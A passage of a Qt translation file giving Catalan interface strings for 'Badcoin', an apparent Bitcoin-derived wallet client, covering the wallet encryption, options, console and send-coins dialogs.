nova contrasenya</translation> </message> <message> <location filename="../askpassphrasedialog.cpp" line="+33"/> <source>Enter the new passphrase to the wallet.&lt;br/&gt;Please use a passphrase of &lt;b&gt;10 or more random characters&lt;/b&gt;, or &lt;b&gt;eight or more words&lt;/b&gt;.</source> <translation>Introdueixi la nova contrasenya al moneder&lt;br/&gt;Si us plau useu una contrasenya de &lt;b&gt;10 o més caracters aleatoris&lt;/b&gt;, o &lt;b&gt;vuit o més paraules&lt;/b&gt;.</translation> </message> <message> <location line="+1"/> <source>Encrypt wallet</source> <translation>Xifrar la cartera</translation> </message> <message> <location line="+3"/> <source>This operation needs your wallet passphrase to unlock the wallet.</source> <translation>Aquesta operació requereix la seva contrasenya del moneder per a desbloquejar-lo.</translation> </message> <message> <location line="+5"/> <source>Unlock wallet</source> <translation>Desbloqueja el moneder</translation> </message> <message> <location line="+3"/> <source>This operation needs your wallet passphrase to decrypt the wallet.</source> <translation>Aquesta operació requereix la seva contrasenya del moneder per a desencriptar-lo.</translation> </message> <message> <location line="+5"/> <source>Decrypt wallet</source> <translation>Desencripta el moneder</translation> </message> <message> <location line="+3"/> <source>Change passphrase</source> <translation>Canviar la contrasenya</translation> </message> <message> <location line="+1"/> <source>Enter the old and new passphrase to the wallet.</source> <translation>Introdueixi tant l&apos;antiga com la nova contrasenya de moneder.</translation> </message> <message> <location line="+46"/> <source>Confirm wallet encryption</source> <translation>Confirmar l&apos;encriptació del moneder</translation> </message> <message> <location line="+1"/> <source>Warning: If you encrypt your wallet and lose your passphrase, you will &lt;b&gt;LOSE ALL OF YOUR BITCOINS&lt;/b&gt;!</source> <translation>Advertència: Si encripteu el vostre moneder i perdeu la constrasenya, &lt;b&gt;PERDREU TOTS ELS VOSTRES BADCOINS&lt;/b&gt;!</translation> </message> <message> <location line="+0"/> <source>Are you sure you wish to encrypt your wallet?</source> <translation>Esteu segur que voleu encriptar el vostre moneder?</translation> </message> <message> <location line="+15"/> <source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source> <translation>IMPORTANT: Tota copia de seguretat que hagis realitzat hauria de ser reemplaçada pel, recentment generat, arxiu encriptat del moneder.</translation> </message> <message> <location line="+100"/> <location line="+24"/> <source>Warning: The Caps Lock key is on!</source> <translation>Advertència: Les lletres majúscules estàn activades!</translation> </message> <message> <location line="-130"/> <location line="+58"/> <source>Wallet encrypted</source> <translation>Moneder encriptat</translation> </message> <message> <location line="-56"/> <source>Bitcoin will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your bitcoins from being stolen by malware infecting your computer.</source> <translation>Badcoin es tancarà ara per acabar el procés d&apos;encriptació. Recorda que encriptar el teu moneder no protegeix completament els teus badcoins de ser robades per programari maliciós instal·lat al teu ordinador.</translation> </message> <message> <location line="+13"/> <location line="+7"/> <location line="+42"/> <location line="+6"/> <source>Wallet encryption failed</source> <translation>L&apos;encriptació del moneder ha fallat</translation> </message> <message> <location line="-54"/> <source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source> <translation>L&apos;encriptació del moneder ha fallat per un error intern. El seu moneder no ha estat encriptat.</translation> </message> <message> <location line="+7"/> <location line="+48"/> <source>The supplied passphrases do not match.</source> <translation>La contrasenya introduïda no coincideix.</translation> </message> <message> <location line="-37"/> <source>Wallet unlock failed</source> <translation>El desbloqueig del moneder ha fallat</translation> </message> <message> <location line="+1"/> <location line="+11"/> <location line="+19"/> <source>The passphrase entered for the wallet decryption was incorrect.</source> <translation>La contrasenya introduïda per a desencriptar el moneder és incorrecte.</translation> </message> <message> <location line="-20"/> <source>Wallet decryption failed</source> <translation>La desencriptació del moneder ha fallat</translation> </message> <message> <location line="+14"/> <source>Wallet passphrase was successfully changed.</source> <translation>La contrasenya del moneder ha estat modificada correctament.</translation> </message> </context> <context> <name>BitcoinGUI</name> <message> <location filename="../bitcoingui.cpp" line="+233"/> <source>Sign &amp;message...</source> <translation>Signar &amp;missatge...</translation> </message> <message> <location line="+280"/> <source>Synchronizing with network...</source> <translation>Sincronitzant amb la xarxa ...</translation> </message> <message> <location line="-349"/> <source>&amp;Overview</source> <translation>&amp;Panorama general</translation> </message> <message> <location line="+1"/> <source>Show general overview of wallet</source> <translation>Mostra panorama general del moneder</translation> </message> <message> <location line="+20"/> <source>&amp;Transactions</source> <translation>&amp;Transaccions</translation> </message> <message> <location line="+1"/> <source>Browse transaction history</source> <translation>Cerca a l&apos;historial de transaccions</translation> </message> <message> <location line="+7"/> <source>Edit the list of stored addresses and labels</source> <translation>Edita la llista d&apos;adreces emmagatzemada i etiquetes</translation> </message> <message> <location line="-14"/> <source>Show the list of addresses for receiving payments</source> <translation>Mostra el llistat d&apos;adreces per rebre pagaments</translation> </message> <message> <location line="+31"/> <source>E&amp;xit</source> <translation>S&amp;ortir</translation> </message> <message> <location line="+1"/> <source>Quit application</source> <translation>Sortir de l&apos;aplicació</translation> </message> <message> <location line="+4"/> <source>Show information about Bitcoin</source> <translation>Mostra informació sobre Badcoin</translation> </message> <message> <location line="+2"/> <source>About &amp;Qt</source> <translation>Sobre &amp;Qt</translation> </message> <message> <location line="+1"/> <source>Show information about Qt</source> <translation>Mostra informació sobre Qt</translation> </message> <message> <location line="+2"/> <source>&amp;Options...</source> <translation>&amp;Opcions...</translation> </message> <message> <location line="+6"/> <source>&amp;Encrypt Wallet...</source> <translation>&amp;Xifrar moneder</translation> </message> <message> <location line="+3"/> <source>&amp;Backup Wallet...</source> <translation>&amp;Realitzant copia de seguretat del moneder...</translation> </message> <message> <location line="+2"/> <source>&amp;Change Passphrase...</source> <translation>&amp;Canviar contrasenya...</translation> </message> <message> <location line="+285"/> <source>Importing blocks from disk...</source> <translation>Important blocs del disc..</translation> </message> <message> <location line="+3"/> <source>Reindexing blocks on disk...</source> <translation>Re-indexant blocs al disc...</translation> </message> <message> <location line="-347"/> <source>Send coins to a Bitcoin address</source> <translation>Enviar monedes a una adreça Badcoin</translation> </message> <message> <location line="+49"/> <source>Modify configuration options for Bitcoin</source> <translation>Modificar les opcions de configuració per badcoin</translation> </message> <message> <location line="+9"/> <source>Backup wallet to another location</source> <translation>Realitzar còpia de seguretat del moneder a un altre directori</translation> </message> <message> <location line="+2"/> <source>Change the passphrase used for wallet encryption</source> <translation>Canviar la constrasenya d&apos;encriptació del moneder</translation> </message> <message> <location line="+6"/> <source>&amp;Debug window</source> <translation>&amp;Finestra de debug</translation> </message> <message> <location line="+1"/> <source>Open debugging and diagnostic console</source> <translation>Obrir la consola de diagnòstic i debugging</translation> </message> <message> <location line="-4"/> <source>&amp;Verify message...</source> <translation>&amp;Verifica el missatge..</translation> </message> <message> <location line="-165"/> <location line="+530"/> <source>Bitcoin</source> <translation>Badcoin</translation> </message> <message> <location line="-530"/> <source>Wallet</source> <translation>Moneder</translation> </message> <message> <location line="+101"/> <source>&amp;Send</source> <translation>&amp;Enviar</translation> </message> <message> <location line="+7"/> <source>&amp;Receive</source> <translation>&amp;Rebre</translation> </message> <message> <location line="+14"/> <source>&amp;Addresses</source> <translation>&amp;Adreces</translation> </message> <message> <location line="+22"/> <source>&amp;About Bitcoin</source> <translation>&amp;Sobre Badcoin</translation> </message> <message> <location line="+9"/> <source>&amp;Show / Hide</source> <translation>&amp;Mostrar / Amagar</translation> </message> <message> <location line="+1"/> <source>Show or hide the main Window</source> <translation>Mostrar o amagar la finestra principal</translation> </message> <message> <location line="+3"/> <source>Encrypt the private keys that belong to your wallet</source> <translation>Xifrar les claus privades pertanyents al seu moneder</translation> </message> <message> <location line="+7"/> <source>Sign messages with your Bitcoin addresses to prove you own them</source> <translation>Signa el missatges amb la seva adreça de Badcoin per provar que les poseeixes</translation> </message> <message> <location line="+2"/> <source>Verify messages to ensure they were signed with specified Bitcoin addresses</source> <translation>Verificar els missatges per assegurar-te que han estat signades amb una adreça Badcoin específica.</translation> </message> <message> <location line="+28"/> <source>&amp;File</source> <translation>&amp;Arxiu</translation> </message> <message> <location line="+7"/> <source>&amp;Settings</source> <translation>&amp;Configuració</translation> </message> <message> <location line="+6"/> <source>&amp;Help</source> <translation>&amp;Ajuda</translation> </message> <message> <location line="+9"/> <source>Tabs toolbar</source> <translation>Barra d&apos;eines de seccions</translation> </message> <message> <location line="+17"/> <location line="+10"/> <source>[testnet]</source> <translation>[testnet]</translation> </message> <message> <location line="+47"/> <source>Bitcoin client</source> <translation>Client Badcoin</translation> </message> <message numerus="yes"> <location line="+141"/> <source>%n active connection(s) to Bitcoin network</source> <translation><numerusform>%n connexió activa a la xarxa Badcoin</numerusform><numerusform>%n connexions actives a la xarxa Badcoin</numerusform></translation> </message> <message> <location line="+22"/> <source>No block source available...</source> <translation type="unfinished"/> </message> <message> <location line="+12"/> <source>Processed %1 of %2 (estimated) blocks of transaction history.</source> <translation>Processat el %1 de %2 (estimat) dels blocs del històric de transaccions.</translation> </message> <message> <location line="+4"/> <source>Processed %1 blocks of transaction history.</source> <translation>Proccessats %1 blocs del històric de transaccions.</translation> </message> <message numerus="yes"> <location line="+20"/> <source>%n hour(s)</source> <translation><numerusform>%n hora</numerusform><numerusform>%n hores</numerusform></translation> </message> <message numerus="yes"> <location line="+4"/> <source>%n day(s)</source> <translation><numerusform>%n dia</numerusform><numerusform>%n dies</numerusform></translation> </message> <message numerus="yes"> <location line="+4"/> <source>%n week(s)</source> <translation><numerusform>%n setmana</numerusform><numerusform>%n setmanes</numerusform></translation> </message> <message> <location line="+4"/> <source>%1 behind</source> <translation>%1 radera</translation> </message> <message> <location line="+14"/> <source>Last received block was generated %1 ago.</source> <translation>Lúltim bloc rebut ha estat generat fa %1.</translation> </message> <message> <location line="+2"/> <source>Transactions after this will not yet be visible.</source> <translation>Les transaccions a partir d&apos;això no seràn visibles.</translation> </message> <message> <location line="+22"/> <source>Error</source> <translation>Error</translation> </message> <message> <location line="+3"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="+3"/> <source>Information</source> <translation>Informació</translation> </message> <message> <location line="+70"/> <source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source> <translation>Aquesta transacció supera el límit de tamany. Tot i així pots enviar-la amb una comissió de %1, que es destinen als nodes que processen la seva transacció i ajuda a donar suport a la xarxa. Vols pagar la comissió?</translation> </message> <message> <location line="-140"/> <source>Up to date</source> <translation>Al dia</translation> </message> <message> <location line="+31"/> <source>Catching up...</source> <translation>Posar-se al dia ...</translation> </message> <message> <location line="+113"/> <source>Confirm transaction fee</source> <translation>Confirmar comisió de transacció</translation> </message> <message> <location line="+8"/> <source>Sent transaction</source> <translation>Transacció enviada</translation> </message> <message> <location line="+0"/> <source>Incoming transaction</source> <translation>Transacció entrant</translation> </message> <message> <location line="+1"/> <source>Date: %1 Amount: %2 Type: %3 Address: %4 </source> <translation>Data: %1\nQuantitat %2\n Tipus: %3\n Adreça: %4\n</translation> </message> <message> <location line="+33"/> <location line="+23"/> <source>URI handling</source> <translation>Manejant URI</translation> </message> <message> <location line="-23"/> <location line="+23"/> <source>URI can not be parsed! This can be caused by an invalid Bitcoin address or malformed URI parameters.</source> <translation>la URI no pot ser processada! Això es pot ser causat per una adreça Badcoin invalida o paràmetres URI malformats.</translation> </message> <message> <location line="+17"/> <source>Wallet is &lt;b&gt;encrypted&lt;/b&gt; and currently &lt;b&gt;unlocked&lt;/b&gt;</source> <translation>El moneder està &lt;b&gt;encriptat&lt;/b&gt; i actualment &lt;b&gt;desbloquejat&lt;/b&gt;</translation> </message> <message> <location line="+8"/> <source>Wallet is &lt;b&gt;encrypted&lt;/b&gt; and currently &lt;b&gt;locked&lt;/b&gt;</source> <translation>El moneder està &lt;b&gt;encriptat&lt;/b&gt; i actualment &lt;b&gt;bloquejat&lt;/b&gt;</translation> </message> <message> <location filename="../bitcoin.cpp" line="+111"/> <source>A fatal error occurred. Bitcoin can no longer continue safely and will quit.</source> <translation>Ha tingut lloc un error fatal. Badcoin no pot continuar executant-se de manera segura i es tancará.</translation> </message> </context> <context> <name>ClientModel</name> <message> <location filename="../clientmodel.cpp" line="+104"/> <source>Network Alert</source> <translation>Alerta de xarxa</translation> </message> </context> <context> <name>EditAddressDialog</name> <message> <location filename="../forms/editaddressdialog.ui" line="+14"/> <source>Edit Address</source> <translation>Editar Adreça</translation> </message> <message> <location line="+11"/> <source>&amp;Label</source> <translation>&amp;Etiqueta</translation> </message> <message> <location line="+10"/> <source>The label associated with this address book entry</source> <translation>Etiqueta associada amb aquesta entrada de la llibreta d&apos;adreces</translation> </message> <message> <location line="+7"/> <source>&amp;Address</source> <translation>&amp;Direcció</translation> </message> <message> <location line="+10"/> <source>The address associated with this address book entry. This can only be modified for sending addresses.</source> <translation>Adreça associada amb aquesta entrada de la llibreta d&apos;adreces. Només pot ser modificat per a enviar adreces.</translation> </message> <message> <location filename="../editaddressdialog.cpp" line="+21"/> <source>New receiving address</source> <translation>Nova adreça de recepció.</translation> </message> <message> <location line="+4"/> <source>New sending address</source> <translation>Nova adreça d&apos;enviament</translation> </message> <message> <location line="+3"/> <source>Edit receiving address</source> <translation>Editar adreces de recepció</translation> </message> <message> <location line="+4"/> <source>Edit sending address</source> <translation>Editar adreces d&apos;enviament</translation> </message> <message> <location line="+76"/> <source>The entered address &quot;%1&quot; is already in the address book.</source> <translation>L&apos;adreça introduïda &quot;%1&quot; ja és present a la llibreta d&apos;adreces.</translation> </message> <message> <location line="-5"/> <source>The entered address &quot;%1&quot; is not a valid Bitcoin address.</source> <translation>L&apos;adreça introduida &quot;%1&quot; no és una adreça Badcoin valida.</translation> </message> <message> <location line="+10"/> <source>Could not unlock wallet.</source> <translation>No s&apos;ha pogut desbloquejar el moneder.</translation> </message> <message> <location line="+5"/> <source>New key generation failed.</source> <translation>Ha fallat la generació d&apos;una nova clau.</translation> </message> </context> <context> <name>GUIUtil::HelpMessageBox</name> <message> <location filename="../guiutil.cpp" line="+424"/> <location line="+12"/> <source>BadCoind-Qt</source> <translation>Badcoin-Qt</translation> </message> <message> <location line="-12"/> <source>version</source> <translation>versió</translation> </message> <message> <location line="+2"/> <source>Usage:</source> <translation>Ús:</translation> </message> <message> <location line="+1"/> <source>command-line options</source> <translation>Opcions de la línia d&apos;ordres</translation> </message> <message> <location line="+4"/> <source>UI options</source> <translation>Opcions de IU</translation> </message> <message> <location line="+1"/> <source>Set language, for example &quot;de_DE&quot; (default: system locale)</source> <translation>Definir llenguatge, per exemple &quot;de_DE&quot; (per defecte: Preferències locals de sistema)</translation> </message> <message> <location line="+1"/> <source>Start minimized</source> <translation>Iniciar minimitzat</translation> </message> <message> <location line="+1"/> <source>Show splash screen on startup (default: 1)</source> <translation>Mostrar finestra de benvinguda a l&apos;inici (per defecte: 1)</translation> </message> </context> <context> <name>OptionsDialog</name> <message> <location filename="../forms/optionsdialog.ui" line="+14"/> <source>Options</source> <translation>Opcions</translation> </message> <message> <location line="+16"/> <source>&amp;Main</source> <translation>&amp;Principal</translation> </message> <message> <location line="+6"/> <source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. Most transactions are 1 kB.</source> <translation type="unfinished"/> </message> <message> <location line="+15"/> <source>Pay transaction &amp;fee</source> <translation>Pagar &amp;comisió de transacció</translation> </message> <message> <location line="+31"/> <source>Automatically start Bitcoin after logging in to the system.</source> <translation>Iniciar automàticament Badcoin després de l&apos;inici de sessió del sistema.</translation> </message> <message> <location line="+3"/> <source>&amp;Start Bitcoin on system login</source> <translation>&amp;Iniciar Badcoin al inici de sessió del sistema.</translation> </message> <message> <location line="+35"/> <source>Reset all client options to default.</source> <translation>Reestablir totes les opcions del client.</translation> </message> <message> <location line="+3"/> <source>&amp;Reset Options</source> <translation>&amp;Reestablir Opcions</translation> </message> <message> <location line="+13"/> <source>&amp;Network</source> <translation>&amp;Xarxa</translation> </message> <message> <location line="+6"/> <source>Automatically open the Bitcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source> <translation>Obrir el port del client de Badcoin al router de forma automàtica. Això només funciona quan el teu router implementa UPnP i l&apos;opció està activada.</translation> </message> <message> <location line="+3"/> <source>Map port using &amp;UPnP</source> <translation>Port obert amb &amp;UPnP</translation> </message> <message> <location line="+7"/> <source>Connect to the Bitcoin network through a SOCKS proxy (e.g. when connecting through Tor).</source> <translation>Connectar a la xarxa Badcoin a través de un SOCKS proxy (per exemple connectant a través de Tor).</translation> </message> <message> <location line="+3"/> <source>&amp;Connect through SOCKS proxy:</source> <translation>&amp;Connecta a través de un proxy SOCKS:</translation> </message> <message> <location line="+9"/> <source>Proxy &amp;IP:</source> <translation>&amp;IP del proxy:</translation> </message> <message> <location line="+19"/> <source>IP address of the proxy (e.g. 127.0.0.1)</source> <translation>Adreça IP del proxy (per exemple 127.0.0.1)</translation> </message> <message> <location line="+7"/> <source>&amp;Port:</source> <translation>&amp;Port:</translation> </message> <message> <location line="+19"/> <source>Port of the proxy (e.g. 9050)</source> <translation>Port del proxy (per exemple 9050)</translation> </message> <message> <location line="+7"/> <source>SOCKS &amp;Version:</source> <translation>&amp;Versió de SOCKS:</translation> </message> <message> <location line="+13"/> <source>SOCKS version of the proxy (e.g. 5)</source> <translation>Versió SOCKS del proxy (per exemple 5)</translation> </message> <message> <location line="+36"/> <source>&amp;Window</source> <translation>&amp;Finestra</translation> </message> <message> <location line="+6"/> <source>Show only a tray icon after minimizing the window.</source> <translation>Mostrar només l&apos;icona de la barra al minimitzar l&apos;aplicació.</translation> </message> <message> <location line="+3"/> <source>&amp;Minimize to the tray instead of the taskbar</source> <translation>&amp;Minimitzar a la barra d&apos;aplicacions</translation> </message> <message> <location line="+7"/> <source>Minimize instead of exit the application when the window is closed. When this option is enabled, the application will be closed only after selecting Quit in the menu.</source> <translation>Minimitza en comptes de sortir de la aplicació al tancar la finestra. Quan aquesta opció està activa, la aplicació només es tancarà al seleccionar Sortir al menú.</translation> </message> <message> <location line="+3"/> <source>M&amp;inimize on close</source> <translation>M&amp;inimitzar al tancar</translation> </message> <message> <location line="+21"/> <source>&amp;Display</source> <translation>&amp;Pantalla</translation> </message> <message> <location line="+8"/> <source>User Interface &amp;language:</source> <translation>Llenguatge de la Interfície d&apos;Usuari:</translation> </message> <message> <location line="+13"/> <source>The user interface language can be set here. This setting will take effect after restarting Bitcoin.</source> <translation>Aquí pots definir el llenguatge de l&apos;aplicatiu. Aquesta configuració tindrà efecte un cop es reiniciï Badcoin.</translation> </message> <message> <location line="+11"/> <source>&amp;Unit to show amounts in:</source> <translation>&amp;Unitats per mostrar les quantitats en:</translation> </message> <message> <location line="+13"/> <source>Choose the default subdivision unit to show in the interface and when sending coins.</source> <translation>Sel·lecciona la unitat de subdivisió per defecte per mostrar en la interficie quan s&apos;envien monedes.</translation> </message> <message> <location line="+9"/> <source>Whether to show Bitcoin addresses in the transaction list or not.</source> <translation>Mostrar adreces Badcoin als llistats de transaccions o no.</translation> </message> <message> <location line="+3"/> <source>&amp;Display addresses in transaction list</source> <translation>&amp;Mostrar adreces al llistat de transaccions</translation> </message> <message> <location line="+71"/> <source>&amp;OK</source> <translation>&amp;OK</translation> </message> <message> <location line="+7"/> <source>&amp;Cancel</source> <translation>&amp;Cancel·la</translation> </message> <message> <location line="+10"/> <source>&amp;Apply</source> <translation>&amp;Aplicar</translation> </message> <message> <location filename="../optionsdialog.cpp" line="+53"/> <source>default</source> <translation>Per defecte</translation> </message> <message> <location line="+130"/> <source>Confirm options reset</source> <translation>Confirmi el reestabliment de les opcions</translation> </message> <message> <location line="+1"/> <source>Some settings may require a client restart to take effect.</source> <translation>Algunes configuracions poden requerir reiniciar el client per a que tinguin efecte.</translation> </message> <message> <location line="+0"/> <source>Do you want to proceed?</source> <translation>Vols procedir?</translation> </message> <message> <location line="+42"/> <location line="+9"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="-9"/> <location line="+9"/> <source>This setting will take effect after restarting Bitcoin.</source> <translation>Aquesta configuració tindrà efecte un cop es reiniciï Badcoin.</translation> </message> <message> <location line="+29"/> <source>The supplied proxy address is invalid.</source> <translation>L&apos;adreça proxy introduïda és invalida.</translation> </message> </context> <context> <name>OverviewPage</name> <message> <location filename="../forms/overviewpage.ui" line="+14"/> <source>Form</source> <translation>Formulari</translation> </message> <message> <location line="+50"/> <location line="+166"/> <source>The displayed information may be out of date. Your wallet automatically synchronizes with the Bitcoin network after a connection is established, but this process has not completed yet.</source> <translation>La informació mostrada pot no estar al día. El teu moneder es sincronitza automàticament amb la xarxa Badcoin un cop s&apos;ha establert connexió, però aquest proces no s&apos;ha completat encara.</translation> </message> <message> <location line="-124"/> <source>Balance:</source> <translation>Balanç:</translation> </message> <message> <location line="+29"/> <source>Unconfirmed:</source> <translation>Sense confirmar:</translation> </message> <message> <location line="-78"/> <source>Wallet</source> <translation>Moneder</translation> </message> <message> <location line="+107"/> <source>Immature:</source> <translation>Immatur:</translation> </message> <message> <location line="+13"/> <source>Mined balance that has not yet matured</source> <translation>Balanç minat que encara no ha madurat</translation> </message> <message> <location line="+46"/> <source>&lt;b&gt;Recent transactions&lt;/b&gt;</source> <translation>&lt;b&gt;Transaccions recents&lt;/b&gt;</translation> </message> <message> <location line="-101"/> <source>Your current balance</source> <translation>El seu balanç actual</translation> </message> <message> <location line="+29"/> <source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source> <translation>Total de transaccions encara sense confirmar, que encara no es content en el balanç actual</translation> </message> <message> <location filename="../overviewpage.cpp" line="+116"/> <location line="+1"/> <source>out of sync</source> <translation>Fora de sincronia</translation> </message> </context> <context> <name>PaymentServer</name> <message> <location filename="../paymentserver.cpp" line="+107"/> <source>Cannot start bitcoin: click-to-pay handler</source> <translation>No es pot iniciar badcoin: manejador clicla-per-pagar</translation> </message> </context> <context> <name>QRCodeDialog</name> <message> <location filename="../forms/qrcodedialog.ui" line="+14"/> <source>QR Code Dialog</source> <translation>Dialeg del codi QR</translation> </message> <message> <location line="+59"/> <source>Request Payment</source> <translation>Reclamar pagament</translation> </message> <message> <location line="+56"/> <source>Amount:</source> <translation>Quantitat:</translation> </message> <message> <location line="-44"/> <source>Label:</source> <translation>Etiqueta:</translation> </message> <message> <location line="+19"/> <source>Message:</source> <translation>Missatge:</translation> </message> <message> <location line="+71"/> <source>&amp;Save As...</source> <translation>&amp;Desar com...</translation> </message> <message> <location filename="../qrcodedialog.cpp" line="+62"/> <source>Error encoding URI into QR Code.</source> <translation>Error codificant la URI en un codi QR.</translation> </message> <message> <location line="+40"/> <source>The entered amount is invalid, please check.</source> <translation>La quantitat introduïda és invalida, si us plau comprovi-la.</translation> </message> <message> <location line="+23"/> <source>Resulting URI too long, try to reduce the text for label / message.</source> <translation>URI resultant massa llarga, intenta reduir el text per a la etiqueta / missatge</translation> </message> <message> <location line="+25"/> <source>Save QR Code</source> <translation>Desar codi QR</translation> </message> <message> <location line="+0"/> <source>PNG Images (*.png)</source> <translation>Imatges PNG (*.png)</translation> </message> </context> <context> <name>RPCConsole</name> <message> <location filename="../forms/rpcconsole.ui" line="+46"/> <source>Client name</source> <translation>Nom del client</translation> </message> <message> <location line="+10"/> <location line="+23"/> <location line="+26"/> <location line="+23"/> <location line="+23"/> <location line="+36"/> <location line="+53"/> <location line="+23"/> <location line="+23"/> <location filename="../rpcconsole.cpp" line="+339"/> <source>N/A</source> <translation>N/A</translation> </message> <message> <location line="-217"/> <source>Client version</source> <translation>Versió del client</translation> </message> <message> <location line="-45"/> <source>&amp;Information</source> <translation>&amp;Informació</translation> </message> <message> <location line="+68"/> <source>Using OpenSSL version</source> <translation>Utilitzant OpenSSL versió</translation> </message> <message> <location line="+49"/> <source>Startup time</source> <translation>&amp;Temps d&apos;inici</translation> </message> <message> <location line="+29"/> <source>Network</source> <translation>Xarxa</translation> </message> <message> <location line="+7"/> <source>Number of connections</source> <translation>Nombre de connexions</translation> </message> <message> <location line="+23"/> <source>On testnet</source> <translation>A testnet</translation> </message> <message> <location line="+23"/> <source>Block chain</source> <translation>Bloquejar cadena</translation> </message> <message> <location line="+7"/> <source>Current number of blocks</source> <translation>Nombre de blocs actuals</translation> </message> <message> <location line="+23"/> <source>Estimated total blocks</source> <translation>Total estimat de blocs</translation> </message> <message> <location line="+23"/> <source>Last block time</source> <translation>Últim temps de bloc</translation> </message> <message> <location line="+52"/> <source>&amp;Open</source> <translation>&amp;Obrir</translation> </message> <message> <location line="+16"/> <source>Command-line options</source> <translation>Opcions de línia d&apos;ordres</translation> </message> <message> <location line="+7"/> <source>Show the BadCoind-Qt help message to get a list with possible Bitcoin command-line options.</source> <translation>Mostrar el missatge d&apos;ajuda de Badcoin-Qt per a obtenir un llistat de possibles ordres per a la línia d&apos;ordres de Badcoin.</translation> </message> <message> <location line="+3"/> <source>&amp;Show</source> <translation>&amp;Mostrar</translation> </message> <message> <location line="+24"/> <source>&amp;Console</source> <translation>&amp;Consola</translation> </message> <message> <location line="-260"/> <source>Build date</source> <translation>Data de compilació</translation> </message> <message> <location line="-104"/> <source>Bitcoin - Debug window</source> <translation>Badcoin -Finestra de debug</translation> </message> <message> <location line="+25"/> <source>Bitcoin Core</source> <translation>Nucli de Badcoin</translation> </message> <message> <location line="+279"/> <source>Debug log file</source> <translation>Dietàri de debug</translation> </message> <message> <location line="+7"/> <source>Open the Bitcoin debug log file from the current data directory. This can take a few seconds for large log files.</source> <translation>Obrir el dietari de debug de Badcoin del directori de dades actual. Aixó pot trigar uns quants segons per a dietàris grossos.</translation> </message> <message> <location line="+102"/> <source>Clear console</source> <translation>Netejar consola</translation> </message> <message> <location filename="../rpcconsole.cpp" line="-30"/> <source>Welcome to the Bitcoin RPC console.</source> <translation>Benvingut a la consola RPC de Badcoin</translation> </message> <message> <location line="+1"/> <source>Use up and down arrows to navigate history, and &lt;b&gt;Ctrl-L&lt;/b&gt; to clear screen.</source> <translation>Utilitza les fletxes d&apos;amunt i avall per navegar per l&apos;històric, i &lt;b&gt;Ctrl-L&lt;\b&gt; per netejar la pantalla.</translation> </message> <message> <location line="+1"/> <source>Type &lt;b&gt;help&lt;/b&gt; for an overview of available commands.</source> <translation>Escriu &lt;b&gt;help&lt;\b&gt; per a obtenir una llistat de les ordres disponibles.</translation> </message> </context> <context> <name>SendCoinsDialog</name> <message> <location filename="../forms/sendcoinsdialog.ui" line="+14"/> <location filename="../sendcoinsdialog.cpp" line="+124"/> <location line="+5"/> <location line="+5"/> <location line="+5"/> <location line="+6"/> <location line="+5"/> <location line="+5"/> <source>Send Coins</source> <translation>Enviar monedes</translation> </message> <message> <location line="+50"/> <source>Send to multiple recipients at once</source> <translation>Enviar a multiples destinataris al mateix temps</translation> </message> <message> <location line="+3"/> <source>Add &amp;Recipient</source> <translation>Affegir &amp;Destinatari</translation> </message> <message> <location line="+20"/> <source>Remove all transaction fields</source> <translation>Netejar tots els camps de la transacció</translation> </message> <message> <location line="+3"/> <source>Clear &amp;All</source> <translation>Esborrar &amp;Tot</translation> </message> <message> <location line="+22"/> <source>Balance:</source> <translation>Balanç:</translation> </message> <message> <location line="+10"/> <source>123.456 BAD</source> <translation>123.456 BAD</translation> </message> <message> <location line="+31"/> <source>Confirm the send action</source> <translation>Confirmi l&apos;acció d&apos;enviament</translation> </message> <message> <location line="+3"/> <source>S&amp;end</source> <translation>E&amp;nviar</translation> </message> <message> <location filename="../sendcoinsdialog.cpp" line="-59"/> <source>&lt;b&gt;%1&lt;/b&gt; to %2 (%3)</source> <translation>&lt;b&gt;%1&lt;/b&gt; to %2 (%3)</translation> </message> <message> <location line="+5"/> <source>Confirm send coins</source> <translation>Confirmar l&apos;enviament de monedes</translation> </message> <message> <location line="+1"/> <source>Are you sure you want to send %1?</source> <translation>Estas segur que vols enviar %1?</translation> </message> <message> <location line="+0"/> <source> and </source> <translation>i</translation> </message> <message> <location line="+23"/> <source>The recipient address is not valid, please recheck.</source> <translation>L&apos;adreça remetent no és vàlida, si us plau comprovi-la.</translation> </message> <message> <location line="+5"/> <source>The amount to pay must be larger than 0.</source> <translation>La quantitat a pagar ha de ser major que 0.</translation> </message> <message> <location line="+5"/> <source>The amount exceeds your balance.</source> <translation>Import superi el saldo de la seva compte.</translation> </message> <message> <location line="+5"/> <source>The total exceeds your balance when the %1 transaction fee is included.</source> <translation>El total excedeix el teu balanç quan s&apos;afegeix la comisió a la transacció %1.</translation> </message> <message> <location line="+6"/> <source>Duplicate address found, can only send to each address once per send operation.</source> <translation>S&apos;ha trobat una adreça duplicada, tan sols es pot enviar a cada adreça un cop per ordre de enviament.</translation> </message> <message> <location line="+5"/> <source>Error: Transaction creation failed!</source> <translation>Error: La ceació de la transacció ha fallat!</translation> </message> <message> <location line="+5"/> <source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source> <translation>Error: La transacció ha estat rebutjada. Això pot passar si alguna de les monedes del teu moneder ja s&apos;han gastat, com si haguesis usat una copia de l&apos;arxiu wallet.dat i s&apos;haguessin gastat monedes de la copia però sense marcar com gastades en aquest.</translation> </message> </context> <context> <name>SendCoinsEntry</name> <message> <location filename="../forms/sendcoinsentry.ui" line="+14"/> <source>Form</source> <translation>Formulari</translation> </message> <message> <location line="+15"/> <source>A&amp;mount:</source> <translation>Q&amp;uantitat:</translation> </message> <message> <location line="+13"/> <source>Pay &amp;To:</source> <translation>Pagar &amp;A:</translation> </message> <message> <location line="+34"/> <source>The address to send the payment to (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>La adreça a on envia el pagament (per exemple: 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+60"/> <location 